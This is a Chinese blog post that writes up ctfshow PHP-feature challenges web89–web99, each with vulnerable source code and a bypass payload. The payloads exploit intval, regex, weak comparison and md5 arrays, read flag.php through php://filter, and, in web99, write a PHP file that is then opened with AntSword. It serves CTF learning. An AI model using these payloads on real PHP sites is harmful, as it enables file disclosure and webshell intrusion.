[ctfshow]php特性练习一

已于 2022-02-11 11:30:56 修改
阅读量1.1k 收藏 1
点赞数 2
分类专栏: 刷题记录 文章标签: php 开发语言 后端
于 2022-02-11 11:17:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/122873024
版权

目录

web89

web90

web91

web92

web93

web94

web95

web96

web97

web98

web99

PHP手册

web89

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

数组绕过正则表达式,如果我们不按规定传一个字符串,而是数组的话,就会返回false,从而不会进入if,达到绕过的效果。

?num[]=1

web90

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

 intval函数的使用

intval ( mixed $var [, int $base = 10 ] ) : int

Note:
如果 base 是 0,通过检测 var 的格式来决定使用的进制:
如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,
如果字符串以 "0" 开始,使用 8 进制(octal);否则,
将使用 10 进制 (decimal)。

intval('4476.0')===4476    小数点  
intval('+4476.0')===4476   正负号
intval('4476e0')===4476    科学计数法
intval('0x117c')===4476    16进制
intval('010574')===4476    8进制
intval(' 010574')===4476   8进制+空格

web91

$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}

i:不区分大小写

m: 多行匹配 若存在换行\n并且有开始^或结束$符的情况下, 将以换行为分隔符,逐行进行匹配 

?cmd=%0aphp

  • %0aphp 经过第一个匹配时,以换行符为分割也就是%0a,前面因为是空的,所以只匹配换行符后面的,所以可以通过。
  • 经过第二个正则表达式时,因为我们是%0aphp 不符合正则表达式的以php开头以php结尾。所以无法通过,最后输出flag 

web92

<?php
 
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

重新回顾php弱比较 

  • 12==“12cdf” --> true,只取字符串中开头的整数部分
  • 1e3dgf这样的字符串在比较时,取的是符合科学计数法的部分:1e3,也就是1000.
  • bool类型的true和任意字符串的弱类型相等(===为完全相等,数据类型和值都相等时返回true。)
  • 字符串比较,就是比较的ASCII码,比"aa">“ab”。
  • 字符串和整数的比较,规则和==的比较是一样的,也就是说,取字符串中开头的整数部分,不过符合科学计数法时要按照科学计数法来取。
  • 如果字符串第一个字母,包括e,就取成0。也就是说"ab"–>0,“e1be”–>0。

?num=4476.1 

web93

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

i:区分大小写

?num=4476.1 

web94

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

strpos()

 strpos() 函数对大小写敏感。

strpos() 函数查找字符串在另一字符串中第一次出现的位置(区分大小写且从0开始)。同时如果没有找到字符串会 FALSE。

同时注意字符串位置是从0开始,而不是从1开始的。

不能用科学计数法

?num=4476.0 

web95

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

1. 值不能是4476
2. 不能含有字母
3. 值中必须有0,但第一个数字不能是0
4. intval($num,0)===4476
5. 不能有小数点

payload:     
?num= 010574  //注意开头的空格
?num=%0a010574
?num=%20010574
?num=+010574
?num=%09010574
?num=%2b010574 (%2b是+的url编码)
 
intval 会对以+或空格开头数字当作正数处理

web96


highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }


}

路径问题 

错误显示

?u=/var/www/html/flag.php              绝对路径
?u=./flag.php                          相对路径
?u=php://filter/read=convert.base64-encode/resource=flag.php     php伪协议

web97

<?php
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

a[]=123&b[]=111 

web98

$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

考的是三目运算符

第一条语句是说不管get传什么都会被post覆盖

第四条语句是说如果get传了一个HTTP_FLAG=flag就输出flag否则显示index.php源码。

get随便传一个,post传HTTP_FLAG=flag

web99

array_push 将一个或多个单元压入数组的末尾(入栈)

in_array (needle,haystack,strict) 检查数组中是否存在某个值

在大海(haystack)中搜索针( needle),如果找到 needle 则返回 true,否则返回 false。

如果第三个参数 strict 的值为 true 则 in_array() 函数还会检查 needle 的类型是否和 haystack 中的相同。如果 needle 是字符串,则比较是区分大小写的。

in_array()函数有缺陷,若没有设置第三个参数,则存在弱比较(类比==)

$allow = array(1,'2','3');                                $allow = array('1','2','3');

var_dump(in_array('1.php',$allow));           var_dump(in_array('1.php',$allow));

返回的为true                                                 返回false

 因为新加进去的随机数字每次都包含1,1存在的几率是最大的。

传入n=1.php。因为PHP在使用 in_array()函数判断时,会将 1.php强制转换成数字1,,而数字1在 range(1,24)数组中,当随机生成的数字正好有1时绕过 in_array()函数判断,此外通过file_put_contents()将php代码写入这个1.php文件中,导致任意文件上传漏洞。

蚁剑连接,访问1.php

 

pipasound
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BUUCTF]刷题记录6
Huamang的博客
04-04 436
[WUSTCTF2020]朴实无华 目录扫描 intval函数的科学记数法绕过 MD5加密后与加密前相等 直接去扫目录,扫到了fl4g.php if (isset($_GET['num'])){ $num = $_GET['num']; if(intval($num) < 2020 && intval($num + 1) > 2021){ echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.&lt
2020-09-03签到赛
Kihyun_的博客
09-03 255
super_easy_web1P1P依旧开心哈哈哈Very_Ez_Unserialize super_easy_web <?php highlight_file('index.php'); include('flag.php'); //try to reach the flag in variable if(isset($_GET['a'])&&isset($_GET['b'])&&isset($_GET['c'])&&isset($_GET['d'].
CTFSHOW WEB89-100 PHP特性 详解
qq_49399033的博客
06-14 5355
CTFSHOW PHP特性做题笔记 详细学习
CTFshow web入门——php特性
小元砸的博客
02-20 5287
Web 89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } }
CTFWeb-PHP弱比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1725
文章目录前言PHP的弱比较No.1 ACTF- PHP的弱比较利用No.2 BJDCTF-MD5的弱/强碰撞PHP反序列化No.1 网鼎杯-朱雀组phpwebNo.2 网鼎杯-青龙组AreUSerialz 前言 在 CTF 比赛的 Web 类型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目类型和利用姿势。 PHP的弱比较 进入正题之前,先介绍下 PHP 弱比较的相关知识,因为它经常出现在
PHP特性(网友根据ctfshow整理)1
08-03
以下是一些重要的PHP特性及其详细解释: 1. **弱类型与`==`比较**: PHP支持弱类型,这意味着在进行比较时,不同类型的数据可以被自动转换成相同类型。例如,字符串"123"与整数123使用`==`比较时,它们被视为相等...
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
WP1-ctfshow
最新发布
02-24
1
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFshow-php特性
weixin_44770698的博客
07-11 1880
CTFshow-php特性学习
threads php,php安装threads多线程扩展
weixin_36473855的博客
03-11 161
[PHP] syntaxhighlighter_viewsource syntaxhighlighter_copycode
shell中 >/dev/null 2>&1
黄亚的博客
09-28 726
shell中>/dev/null 2>&1 1. /dev/null 这条命令的作用是将标准输出1重定向到/dev/null中。/dev/null代表linux的空设备文件,所有往这个文件里面写入的内容都会丢失,俗称“黑洞”。那么执行了>/dev/null之后,标准输出就会不再存在,没有任何地方能够找到输出的内容。 2>&1 这条命令用到了重定向...
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5604
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
文件包含漏洞基础概述及操作
weixin_48734687的博客
07-25 297
什么是文件包含 为了更好的理解文件包含,我们首先应了解对于文件包含重要的函数:include() Include()函数的参数为被包含文件的地址,若地址正确,根据被包含文件的内容,执行结果分为两种情况。 1.文件中不含有PHP标签( <?php ?> ),这种情况下执行include函数,将直接输出文件内容。 2.若文件内容被php标签包裹,则会按照php标准执行php代码。 —注意!虽然 <br> 没有被php标签包裹,但由于文件是在浏览器端执行,所以会被当成HTML代码执行
CTFshow-PHP特性89-90
weixin_51706044的博客
09-29 793
web89 if(isset($_GET['num'])){<br /> $num = $_GET['num'];<br /> if(preg_match("/[0-9]/", $num)){ //正则匹配参数不能为0-9<br /> die("no no no!");<br /> }<br /> if(intval($num)){ //返回num参数的值是,整数型<br /> echo $flag;<br /> }&lt.
CTFshow_命令执行
qq_45927819的博客
11-20 1246
文章目录web29 web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag get方式传参: ?c=system(ls); 发现flag.php 直接查看就行: ?c=system('cat ')
PHP表单汇总
eyes++的博客
07-23 647
PHP 表单 PHP 表单验证 PHP 表单——必须字段 PHP 表单——验证邮件和URL PHP 完整表单实例 $_GET 变量 $_POST 变量
php __set __get __isset __unset用法防被忽悠分析
云烟阁
12-03 7440
大家好我是小烟 今天分享下 php面向对象中__set __get __isset __unset用法之防忽悠介绍 今天详细讲解下这四个魔术方法的用法。和一些注意要点!
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值